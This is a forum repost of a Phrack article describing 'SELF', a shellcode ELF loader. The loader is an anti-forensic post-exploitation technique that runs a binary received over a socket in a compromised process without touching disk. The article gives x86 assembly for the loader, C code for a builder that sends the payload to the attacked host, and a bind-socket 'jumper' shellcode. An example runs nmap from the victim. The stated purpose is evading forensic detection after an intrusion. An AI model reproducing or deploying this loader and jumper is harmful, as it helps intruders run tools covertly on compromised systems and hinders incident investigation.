Nytro Posted August 15, 2013 Report Posted August 15, 2013 Advanced Antiforensics : SELF ==Phrack Inc.== Volume 0x0b, Issue 0x3f, Phile #0x0b of 0x14|=----------------=[ Advanced Antiforensics : SELF ]=-------------------=||=-----------------------------------------------------------------------=||=------------------------=[ Pluf & Ripe ]=------------------------------=||=-----------------------[ www.7a69ezine.org ]=--------------------------=| 1 - Introduction 2 - Userland Execve 3 - Shellcode ELF loader 4 - Design and Implementation 4.1 - The lxobject 4.1.1 - Static ELF binary 4.1.2 - Stack context 4.1.3 - Shellcode loader 4.2 - The builder 4.3 - The jumper 5 - Multiexecution 5.1 - Gits 6 - Conclusion 7 - Greetings 8 - References A - Tested systems B - Sourcecode---[ 1 - IntroductionThe techniques of remote services' exploitation have made a substantial progress. At the same time, the range of shellcodes have increased andincorporates new and complex anti-detection techniques like polymorphismfunctionalities.In spite of the advantages that all these give to the attackers, a call tothe syscall execve is always needed; that ends giving rise to a series of problems: - The access to the syscall execve may be denied if the host uses some kind of modern protection system. - The call to execve requires the file to execute to be placed in the hard disk. Consequently, if '/bin/shell' does not exist, which is a common fact in chroot environments, the shellcode will not be executed properly. - The host may not have tools that the intruder may need, thus creating the need to upload them, which can leave traces of the intrusion in the disk.The need of a shellcode that solves them arises. The solution is found in the 'userland exec'.---[ 2 - Userland ExecveThe procedure that allows the local execution of a program avoiding the useof the syscall execve is called 'userland exec' or 'userland execve'. It's basically a mechanism that simulates correctly and orderly most of theprocedures that the kernel follows to load an executable file in memory and start its execution. It can be summarized in just three steps: - Load of the binary's required sections into memory. - Initialization of the stack context. - Jump to the entry point (starting point).The main aim of the 'userland exec' is to allow the binaries to load avoidingthe use of the syscall execve that the kernel contains, solving the first ofthe problems stated above. At the same time, as it is a specific implementationwe can adapt its features to our own needs. We'll make it so the ELF file will not be read from the hard disk but from other supports like a socket.With this procedure, the other two problems stated before are solved because the file '/bin/sh' doesn't need to be visible by the exploited process but can be read from the net. On the other hand, tools that don't reside in thedestination host can also be executed. The first public implementation of a execve in a user environment was made by"the grugq" [1], its codification and inner workings are perfect but it has some disadvantages: - Doesn't work for real attacks. - The code is too large and difficult to port.Thanks to that fact it was decided to put our efforts in developing another'userland execve' with the same features but with a simpler codification and oriented to exploits' use. The final result has been the 'shellcode ELFloader'.---[ 3 - Shellcode ELF loaderThe shellcode ELF loader or Self is a new and sophisticated post-exploitationtechnique based on the userland execve. It allows the load and execution of a binary ELF file in a remote machine without storing it on disk or modifyingthe original filesystem. The target of the shellcode ELF loader is to providean effective and modern post-exploitation anti-forensic system for exploits combined with an easy use. That is, that an intruder can execute as many applications as he desires.---[ 4 - Design and ImplementationObtaining an effective design hasn't been an easy task, different options have been considered and most of them have been dropped. At last, it was selected the most creative design that allows more flexibility, portability and a great ease of use.The final result is a mix of multiple pieces, independent one of another, that realize their own function and work together in harmony. This pieces are three: the lxobject, the builder and the jumper. These elements will makethe task of executing a binary in a remote machine quite easy. The lxobject is a special kind of object that contains all the required elements to changethe original executable of a guest process by a new one. The builder and jumper are the pieces of code that build the lxobject, transfer it from the local machine (attacker) to the remote machine (attacked) and activate it.As a previous step before the detailed description of the inner details of this technique, it is needed to understand how, when and where it must be used. Here follows a short summary of its common use: - 1st round, exploitation of a vulnerable service: In the 1st round we have a machine X with a vulnerable service Y. We want to exploit this juicy process so we use the suitable exploit using as payload (shellcode) the jumper. When exploited, the jumper is executed and we're ready to the next round. - 2nd round, execution of a binary: Here is where the shellcode ELF loader takes part; a binary ELF is selected and the lxobject is constructed. Then, we sent it to the jumper to be activated. The result is the load and execution of the binary in a remote machine. We win the battle!!---[ 4.1 - The lxobjectWhat the hell is that? A lxobject is an selfloadable and autoexecutable object, that is to say, an object specially devised to completely replace theoriginal guest process where it is located by a binary ELF file that carriesand initiates its execution. Each lxobject is built in the intruder machineusing the builder and it is sent to the attacked machine where the jumperreceives and activates it.Therefore, it can be compared to a missile that is sent from a place to theimpact point, being the explosive charge an executable. This missile is builtfrom three assembled parts: a binary static ELF, a preconstructed stack context and a shellcode loader.---[ 4.1.1 - Static ELF binaryIt's the first piece of a lxobject, the binary ELF that must be loaded andexecuted in a remote host. It's just a common executable file, staticallycompiled for the architecture and system in which it will be executed.It was decided to avoid the use of dynamic executables because it would addcomplexity which isn't needed in the loading code, noticeably raising the rate of possible errors.---[ 4.1.2 - Stack contextIt's the second piece of a lxobject; the stack context that will be needed bythe binary. Every process has an associated memory segment called stack wherethe functions store its local variables. During the binary load process, thekernel fills this section with a series of initial data requited for itssubsequent execution. We call it 'initial stack context'.To ease the portability and specially the loading process, a preconstructedstack context was adopted. That is to say, it is generated in our machine andit is assembled with the binary ELF file. The only required knowledge is theformat and to add the data in the correct order. To the vast majority ofUNIX systems it looks like: .----------------. .--> | alignment | | |================| | | Argc | - Arguments (number) | |----------------| | | Argv[] | ---. - Arguments (vector) | |----------------| | | | Envp[] | ---|---. - Environment variables (vector) | |----------------| | | | | argv strings | <--' | | |----------------| | - Argv and envp data (strings) | | envp strings | <------' | |================| '--- | alignment | -------> Upper and lower alignments '----------------'This is the stack context, most reduced and functional available for us. As it can be observed no auxiliary vector has been added because the work with static executables avoids the need to worry about linking. Also, there isn'tany restriction about the allowed number of arguments and environment variables; a bunch of them can increase the context's size but nothing more.As the context is built in the attacker machine, that will usually be different from the attacked one; knowledge of the address space in which the stack is placed will be required. This is a process that is automaticallydone and doesn't suppose a problem.*--[ 4.1.3 - Shellcode LoaderThis is the third and also the most important part of a lxobject. It's ashellcode that must carry on the loading process and execution of a binaryfile. it is really a simple but powerful implementation of userland execve().The loading process takes the following steps to be completed successfully (x86 32bits): * pre-loading: first, the jumper must do some operations before anything else. It gets the memory address where the lxobject has been previously stored and pushes it into the stack, then it finds the loader code and jumps to it. The loading has begun. __asm__( "push %0\n" "jmp *%1" : : "c"(lxobject),"b"(*loader) ); * loading step 1: scans the program header table and begins to load each PT_LOAD segment. The stack context has its own header, PT_STACK, so when this kind of segment is found it will be treated differently from the rest (step 2) .loader_next_phdr: // Check program header type (eax): PT_LOAD or PT_STACK movl (%edx),%eax // If program header type is PT_LOAD, jump to .loader_phdr_load // and load the segment referenced by this header cmpl $PT_LOAD,%eax je .loader_phdr_load // If program header type is PT_STACK, jump to .loader_phdr_stack // and load the new stack segment cmpl $PT_STACK,%eax je .loader_phdr_stack // If unknown type, jump to next header addl $PHENTSIZE,%edx jmp .loader_next_phdr For each PT_LOAD segment (text/data) do the following: * loading step 1.1: unmap the old segment, one page a time, to be sure that there is enough room to fit the new one: movl PHDR_VADDR(%edx),%edi movl PHDR_MEMSZ(%edx),%esi subl $PG_SIZE,%esi movl $0,%ecx .loader_unmap_page: pushl $PG_SIZE movl %edi,%ebx andl $0xfffff000,%ebx addl %ecx,%ebx pushl %ebx pushl $2 movl $SYS_munmap,%eax call do_syscall addl $12,%esp addl $PG_SIZE,%ecx cmpl %ecx,%esi jge .loader_unmap_page * loading step 1.2: map the new memory region. pushl $0 pushl $0 pushl $-1 pushl $MAPS pushl $7 movl PHDR_MEMSZ(%edx),%esi pushl %esi movl %edi,%esi andl $0xffff000,%esi pushl %esi pushl $6 movl $SYS_mmap,%eax call do_syscall addl $32,%esp * loading step 1.3: copy the segment from the lxobject to that place: movl PHDR_FILESZ(%edx),%ecx movl PHDR_OFFSET(%edx),%esi addl %ebp,%esi repz movsb * loading step 1.4: continue with next header: addl $PHENTSIZE,%edx jmp .loader_next_phdr * loading step 2: when both text and data segments have been loaded correctly, it's time to setup a new stack: .loader_phdr_stack: movl PHDR_OFFSET(%edx),%esi addl %ebp,%esi movl PHDR_VADDR(%edx),%edi movl PHDR_MEMSZ(%edx),%ecx repz movsb * loading step 3: to finish, some registers are cleaned and then the loader jump to the binary's entry point or _init(). .loader_entry_point: movl PHDR_ALIGN(%edx),%esp movl EHDR_ENTRY(%ebp),%eax xorl %ebx,%ebx xorl %ecx,%ecx xorl %edx,%edx xorl %esi,%esi xorl %edi,%edi jmp *%eax * post-loading: the execution has begun.As can be seen, the loader doesn't undergo any process to build the stackcontext, it is constructed in the builder. This way, a pre-designed context isavailable and should simply be copied to the right address space inside theprocess.Despite the fact of codifying a different loader to each architecture theoperations are plain and concrete. Whether possible, hybrid loaders capable of functioning in the same architectures but with the different syscalls methods of the UNIX systems should be designed. The loader we have developedfor our implementation is an hybrid code capable of working under Linux and BSD systems on x86/32bit machines.---[ 4.2 - The builderIt has the mission of assembling the components of a lxobject and then sending it to a remote machine. It works with a simple command line design and its format is as follows: ./builder <host> <port> <exec> <argv> <envp>where: host, port = the attached machine address and the port where the jumper is running and waiting exec = the executable binary file we want to execute argv, envp = string of arguments and string of environment variables, needed by the executable binaryFor instance, if we want to do some port scanning from the attacked host, wewill execute an nmap binary as follows: ./builder 2002 nmap-static "-P0;-p;23;172.26.1-30" "PATH=/bin"Basically, the assembly operations performed are the following: * allocate enough memory to store the executable binary file, the shellcode loader and the stack's init context. elf_new = (void*)malloc(elf_new_size); * insert the executable into the memory area previously allocated and then clean the fields which describe the section header table because they won't be useful for us as we will work with an static file. Also, the section header table could be removed anyway. ehdr_new->e_shentsize = 0; ehdr_new->e_shoff = 0; ehdr_new->e_shnum = 0; ehdr_new->e_shstrndx = 0; * build the stack context. It requires two strings, the first one contains the arguments and the second one the environment variables. Each item is separated by using a delimiter. For instance: <argv> = "arg1;arg2;arg3;-h" <envp> = "PATH=/bin;SHELL=sh" Once the context has been built, a new program header is added to the binary's program header table. This is a PT_STACK header and contains all the information which is needed by the shellcode loader in order to setup the new stack. * the shellcode ELF loader is introduced and its offset is saved within the e_ident field in the elf header. memcpy(elf_new + elf_new_size - PG_SIZE + LOADER_CODESZ, loader, LOADER_CODESZ); ldr_ptr = (unsigned long *)&ehdr_new->e_ident[9]; *ldr_ptr = elf_new_size - PG_SIZE + LOADER_CODESZ; * the lxobject is ready, now it's sent to specified the host and port. connect(sfd, (struct sockaddr *)&srv, sizeof(struct sockaddr) write(sfd, elf_new, elf_new_size);An lxobject finished and assembled correctly, ready to be sent, looks like this: [ Autoloadable and Autoexecutable Object ] .------------------------------------------------ | | [ Static Executable File (1) ] | .--------------------------------. | | | | | .----------------------. | | | | ELF Header )---------|----|--. | | |----------------------| | | Shellcode Elf loader (3) | | | Program Header Table | | | hdr->e_ident[9] | | | | | | | | | + PT_LOAD0 | | | | | | + PT_LOAD1 | | | | | | ... | | | | | | ... | | | | | | + PT_STACK )---------|----|--|--. | | | | | | | Stack Context (2) | | |----------------------| | | | | | | Sections (code/data) | | | | | '--> |----------------------| <--' | | | .--> |######################| <-----' | | | |## SHELLCODE LOADER ##| | | P | |######################| | | A | | | | | G | | ....... | | | E | | ....... | | | | | | | | | |######################| <--------' | | |#### STACK CONTEXT ###| | | |######################| | '--> '----------------------' | '--------------------[ 4.3 - The jumperIt is the shellcode which have to be used by an exploit during the exploitationprocess of a vulnerable service. Its focus is to activate the incoming lxobjectand in order to achieve it, at least the following operations should be done: - open a socket and wait for the lxobject to arrive - store it anywhere in the memory - activate it by jumping into the loaderThose are the minimal required actions but it is important to keep in mind that a jumper is a simple shellcode so any other functionality can be added previously: break a chroot, elevate privileges, and so on.1) how to get the lxobject? It is easily achieved, already known techniques, as binding to a port and waiting for new connections or searching in the process' FD table those that belong to socket, can be applied. Additionally, cipher algorithms can be added but this would lead to huge shellcodes, difficult to use.2) and where to store it? There are three possibilities: a) store it in the heap. We just have to find the current location of the program break by using brk(0). However, this method is dangerous and unsuitable because the lxobject could be unmapped or even entirely overwritten during the loading process. store it in the process stack. Provided there is enough space and we know where the stack starts and finishes, this method can be used but it can also be that the stack isn't be executable and then it can't be applied. c) store it in a new mapped memory region by using mmap() syscall. This is the better way and the one we have used in our code. Due to the nature of a jumper its codification can be personalized and adapted to many different contexts. An example of a generic jumper written in C is as it follows: lxobject = (unsigned char*)mmap(0, LXOBJECT_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, -1, 0); addr.sin_family = AF_INET; addr.sin_port = htons(atoi(argv[1])); addr.sin_addr.s_addr = 0; sfd = socket(AF_INET, SOCK_STREAM, 0)); bind(sfd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)); listen(sfd, 10); nsfd = accept(sfd, NULL, NULL)); for (i = 0 ; i < 255 ; i++) { if (recv(i, tmp, 4, MSG_PEEK) == 4) { if (!strncmp(&tmp[1], "ELF", 3)) break; } } recv(i, lxobject, MAX_OBJECT_SIZE, MSG_WAITALL); loader = (unsigned long *)&lxobject[9]; *loader += (unsigned long)lxobject; __asm__( "push %0\n" "jmp *%1" : : "c"(lxobject),"b"(*loader) );---[ 5 - MultiexecutionThe code included in this article is just a generic implementation of ashellcode ELF loader which allows the execution of a binary once at time.If we want to execute that binary an undefined number of times (to parse morearguments, test new features, etc) it will be needed to build and send a newlxobject for each try. Although it obviously has some disadvantages, it'senough for most situations. But what happens if what we really wish is toexecute our binary a lot of times but from the other side, that is, fromthe remote machine, without building the lxobject?To face this issue we have developed another technique called "multi-execution".The multi-execution is a much more advanced derived implementation. Its main feature is that the process of building a lxobject is always done in the remote machine, one binary allowing infinite executions. Something like working with a remote shell. One example of tool that uses a multi-execution environment is the gits project or "ghost in the system".*--[ 5.1 - GitsGits is a multi-execution environment designed to operate on attacked remotemachines and to limit the amount of forensic evidence. It should be viewed asa proof of concept, an advanced extension with many features. It comprises alauncher program and a shell, which is the main part. The shell gives you thepossibility of retrieving as many binaries as desired and execute them as many times as wished (a process of stack context rebuilding and binary patching is done using some advanced techniques). Also, built-in commands, jobcontrol, flow redirection, remote file manipulation, and so on have been added.---[ 6 - ConclusionsThe forensic techniques are more sophisticated and complete every day, wherethere was no trace left, now there's a fingerprint; where there was only oneevidence left, now there are hundreds. A never-ending battle between those whowouldn't be detected and those who want to detect. To use the memory and leave the disk untouched is a good policy to avoid the detection. The shellcode ELF loader develops this post-exploitation plainly and elegantly.---[ 7 - Greetings7a69ezine crew & redbull.---[ 8 - References [1] The Design and Implementation of ul_exec - the grugq http://securityfocus.com/archive/1/348638/2003-12-29/2004-01-04/0 [2] Remote Exec - the grugq http://www.phrack.org/show.php?p=62&a=8 [3] Ghost In The System Project http://www.7a69ezine.org/project/gits---[ A - Tested systemsThe next table summarize the systems where we have tested all this fuckingshit. /----------v----------\ | x86 | amd64 | /------------+----------+----------< | Linux 2.4 | works | works | >------------+----------+----------< | Linux 2.6 | works | works | >------------+----------+----------< | FreeBSD | works | untested | >------------+----------+----------< | NetBSD | works | untested | \------------^----------^----------/---[ B - SourcecodeSursa: https://sites.google.com/site/x86pfxlab/oldstuff Quote